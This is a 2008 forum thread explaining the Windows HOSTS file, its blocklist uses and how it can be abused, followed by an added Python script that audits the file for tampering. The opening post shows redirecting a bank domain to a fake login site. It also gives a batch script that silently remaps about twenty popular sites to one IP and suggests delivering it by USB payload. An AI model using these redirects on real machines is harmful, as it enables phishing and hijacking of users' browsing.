sablefoxx Posted April 5, 2008

The Newbie's Guide to the HOSTS File

Let me just say, this isn't a 'hack', but it's good to know what the HOSTS file is and how it can be used for good and evil.

What is the HOSTS file?

The HOSTS file is basically a DNS; that's what takes those URLs (those 'www.namehere.com' things) and converts them to IP addresses. This is generally done by a DNS server controlled by the ISP; however, with Windows/Linux, before the computer checks with the DNS server it first checks the HOSTS file for an entry. Because this is a change to Windows, it will affect all browsers: IE, Firefox, etc.

Practical Uses:

The HOSTS file is stored in %systemroot%\drivers\etc (Windows XP/Vista only). Change to this directory and open the hosts file in Notepad to edit it. It is likely that it only contains one or two entries that look something like this:

    127.0.0.1 localhost
    ::1 localhost

However, some anti-virus programs use this file to store a 'blacklist' of bad websites you'd never want to actually go to (like phishing sites). If this is so, the hosts file will contain something like this:

    127.0.0.1 localhost
    127.0.0.1 www.usbank.freehosting.com
    ::1 localhost

So instead of going to 'www.usbank.freehosting.com' you go to 127.0.0.1 (your machine), which is probably not running an HTTP server, and thus you get a 'can not find server' error and YAY, the virus has been stopped. You can find large pre-made blacklists all over the internet, like this one that blocks ads ( http://www.hosts-file.net/?s=Download ).

This trait can also be used for censorship (though not extremely effective). Say you're an employer and wanted to prevent access to myspace.com from your computers; simply add an entry for myspace like so:

    127.0.0.1 localhost
    127.0.0.1 www.myspace.com
    ::1 localhost

And now the computer will not connect to myspace.com anymore (unless they use a proxy/edit the hosts).

The Dark Side:

We can also abuse this trait of Windows to re-direct a user to a website we control, like so:

    127.0.0.1 localhost
    75.126.15.21 www.usbank.com
    ::1 localhost

Now when the user types in 'www.usbank.com' they will go to 75.126.15.21, which could be anything we want (even a fake usbank.com used to gather logins).

Customize the HOSTS file:

First find the IP address of the website you want the user to end up at. To do this, open up a command prompt and type "tracert [website here]". For example, if we wanted to redirect traffic from yahoo.com to google.com, first we must get Google's IP, so we would type "tracert www.google.com", revealing the IP "64.233.167.147", so in the HOSTS we want to enter:

    64.233.167.147 www.yahoo.com

Now all yahoo traffic will end up at google :) Or we can automate the process with a simple .bat script like so:

Auto-Patch the Hosts File to do Your Will

(Copy paste this text into a word document and save as autohosts.bat)

    @echo off
    cls
    echo Patching HOSTS file...
    cd %systemroot%
    cd system32
    cd drivers
    cd etc
    :: Add your own redirects! Here is the syntax
    :: echo [IP] [URL] >>hosts
    :: When a person types in the URL above they will get redirected to the IP
    echo 75.126.15.21 www.google.com >>hosts
    echo 75.126.15.21 www.digg.com >>hosts
    echo 75.126.15.21 www.yahoo.com >>hosts
    echo 75.126.15.21 www.gmail.com >>hosts
    echo 75.126.15.21 www.slashdot.org >>hosts
    echo 75.126.15.21 www.youtube.com >>hosts
    echo 75.126.15.21 www.cnn.com >>hosts
    echo 75.126.15.21 www.walmart.com >>hosts
    echo 75.126.15.21 www.foxnews.com >>hosts
    echo 75.126.15.21 www.ebay.com >>hosts
    echo 75.126.15.21 www.wikipedia.org >>hosts
    echo 75.126.15.21 www.myspace.com >>hosts
    echo 75.126.15.21 www.facebook.com >>hosts
    echo 75.126.15.21 www.bestbuy.com >>hosts
    echo 75.126.15.21 www.aol.com >>hosts
    echo 75.126.15.21 www.nytimes.com >>hosts
    echo 75.126.15.21 www.symantec.com >>hosts
    echo 75.126.15.21 www.hotmail.com >>hosts
    echo 75.126.15.21 www.msn.com >>hosts
    echo 75.126.15.21 www.imbd.com >>hosts
    echo 75.126.15.21 www.microsoft.com >>hosts
    echo done!
    exit
    :: i can see the rick roles alrdy

This will re-direct some of the most commonly visited websites on the internet to the target IP :) This could even be integrated with a USB payload if one desired so :) And guys, be mature, don't set up your friend's computer to go to tubgirl or meatspin ;)

More Information:

Check out Security Now Ep. #45 >> http://www.grc.com/securitynow.htm#45
Wikipedia Article (much better than mine) >> http://en.wikipedia.org/wiki/Hosts_file

Have Fun!

Sparda Makes a Good Point:

Can I just be clear for a moment, the hosts file doesn't redirect and should not be viewed as such (if you do view it as a way of redirecting a browser, then a DNS server's lookup would also be classifiable as a redirect). The hosts file serves as a way of permanently pointing a host name to an IP address. It has a genuine use in security. The main one being that if you know the IP address of a named server will never change, you might want to enter this into the hosts file because then your computer isn't relying on a third party service to know it is going to the correct address. Doing this prevents DNS poisoning via a man in the middle attack. They still could pretend to be the 'trusted' IP address if they were able, but now they have to be able to modify the routes to the trusted IP address rather than just responding maliciously to a DNS query. "Anything you can do to slow down the bad guys is a good thing" -- Pauldotcom

Perhaps 'Misdirect' is a better choice of words
digip Posted April 5, 2008

Not to be a dick, but the HOSTS file is pretty common knowledge among Windows users and is often targeted by Virii to block you from being able to update your virus definitions and also keep you from getting Microsoft updates. There are a lot of threads that already talk about the HOSTS file too, and I have even posted my personal HOSTS file in one of them a while ago.

Also, there are different paths for the HOSTS file depending on the version of Windows you're running. Anything older than XP stores it in the c:\windows folder or the %windir% on the current drive (this is Windows 95, Windows 98). XP Pro/NT/Windows 2000 is in c:\winnt\system32\drivers\etc\hosts, while all other versions of XP other than XP Pro are in c:\windows\system32\drivers\etc\hosts. Server 2003 and Vista I think are c:\windows\system32\drivers\etc, but I can not confirm this on Server 2003 and Vista since I am not running them at the moment. A quick google will probably give you the path though.
sablefoxx Posted April 5, 2008 (Author)

> Not to be a dick, but the HOSTS file is pretty common knowledge among windows users

Actually that's what I thought, but like the last 20 people I've talked to had no idea about it. This is more a newbie's guide to the hosts file (it's not that complicated).
PrototypeShogun Posted June 4, 2008

Years ago when I moved to a new city and didn't have internet, but still wanted to work on webpages and have them viewable on the network... I edited all the hosts files on the computers to direct the URL to the IP of my computer on the network. It was easier than editing WAMP to let anyone on the network view it.... remember I didn't have internet. Hope that opens some minds as to weird MacGyver uses for the hosts file.
MRGRIM Posted June 5, 2008

Nothing I didn't already know, but a decent article nonetheless. The tubgirl comment made me chuckle - sometimes the easier the prank the better ;)
Taulmarill Posted June 5, 2008

Linux and most *NIX OSs have a similar file located at /etc/hosts. And remember, this does not only affect browsers but every program that performs DNS lookups.
Rotting Corpse Posted June 5, 2008

I didn't know about HOST files till I read this thread! Very interesting, I might just try the tubgirl prank on my friend next time I'm at his house!
digip Posted June 5, 2008

Here is a good one for ad blocking and general crapware: http://www.mvps.org/winhelp2002/hosts.txt I use this in addition to my own list of sites I block.
Rab Posted June 6, 2008

Yea I use the HOSTS file every day, but yeah I guess this helps people learn. There are plenty of things on Hak5 I didn't know about before, so it's all fair game.
Sparda Posted June 6, 2008

Can I just be clear for a moment, the hosts file doesn't redirect and should not be viewed as such (if you do view it as a way of redirecting a browser, then a DNS server's lookup would also be classifiable as a redirect). The hosts file serves as a way of permanently pointing a host name to an IP address. It has a genuine use in security. The main one being that if you know the IP address of a named server will never change, you might want to enter this into the hosts file because then your computer isn't relying on a third party service to know it is going to the correct address. Doing this prevents DNS poisoning via a man in the middle attack. They still could pretend to be the 'trusted' IP address if they were able, but now they have to be able to modify the routes to the trusted IP address rather than just responding maliciously to a DNS query. "Anything you can do to slow down the bad guys is a good thing" -- Pauldotcom

bad spelling and obvious mistakes = GB spell checking + firefox + windows = fail
digip Posted June 7, 2008

Read up - http://www.0x000000.com/?i=562

It's a pretty nasty (and simple) sploit, but this only works on IE. Even though it says it's JavaScript, it's actually VBScript. fso writes will not run on Opera (or Firefox as far as I know). Unless you have your IE browser set to allow all ActiveX and scripting, you should get an alert prompt or the yellow bar explaining it wants to block it from running and you have to manually allow it. Then again, an ActiveX sploit with this as the payload might go undetected. I have my firewall set up to not allow changes to the hosts file, so either way, I get alerted if something tries to write to or change it.
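
A defender's view of the tampering discussed in this thread, as an added example that is not part of any post here: a small Python audit that parses hosts-file text, flags names pinned to a non-loopback address and update sites sinkholed to loopback, and fingerprints the file so a later change can be noticed. The `UPDATE_HOSTS` watchlist, the reason labels and the sample file are assumptions constructed for this example.

```python
import hashlib
import ipaddress

# Assumed watchlist (constructed): names that malware blocks to stop updates.
UPDATE_HOSTS = {"www.symantec.com", "www.microsoft.com"}

# Constructed sample built from the entries quoted in this thread.
SAMPLE = """\
# sample hosts file
127.0.0.1 localhost
::1 localhost
127.0.0.1 www.usbank.freehosting.com
75.126.15.21 www.usbank.com
127.0.0.1 www.symantec.com
"""

def parse_hosts(text):
    """Yield (line number, address, lowercased name) for each mapping."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()  # drop comments
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # not an address, skip the line
        for name in fields[1:]:  # one line may carry several aliases
            yield lineno, ip, name.lower()

def audit_hosts(text):
    """Return (line, name, address, reason) for entries worth a look."""
    findings = []
    for lineno, ip, name in parse_hosts(text):
        sinkhole = ip.is_loopback or ip.is_unspecified  # 127.x, ::1, 0.0.0.0
        if name == "localhost":
            if not ip.is_loopback:
                findings.append((lineno, name, str(ip), "localhost-remapped"))
        elif sinkhole:
            if name in UPDATE_HOSTS:  # ordinary blocklist entries pass
                findings.append((lineno, name, str(ip), "update-site-blocked"))
        else:
            findings.append((lineno, name, str(ip), "static-mapping-review"))
    return findings

def fingerprint(text):
    """SHA-256 of the file content, to compare against a stored baseline."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE):
        print(finding)
```

A "static-mapping-review" finding is not proof of tampering, since deliberate pins such as a LAN development server produce it too; it marks the entries someone should be able to account for.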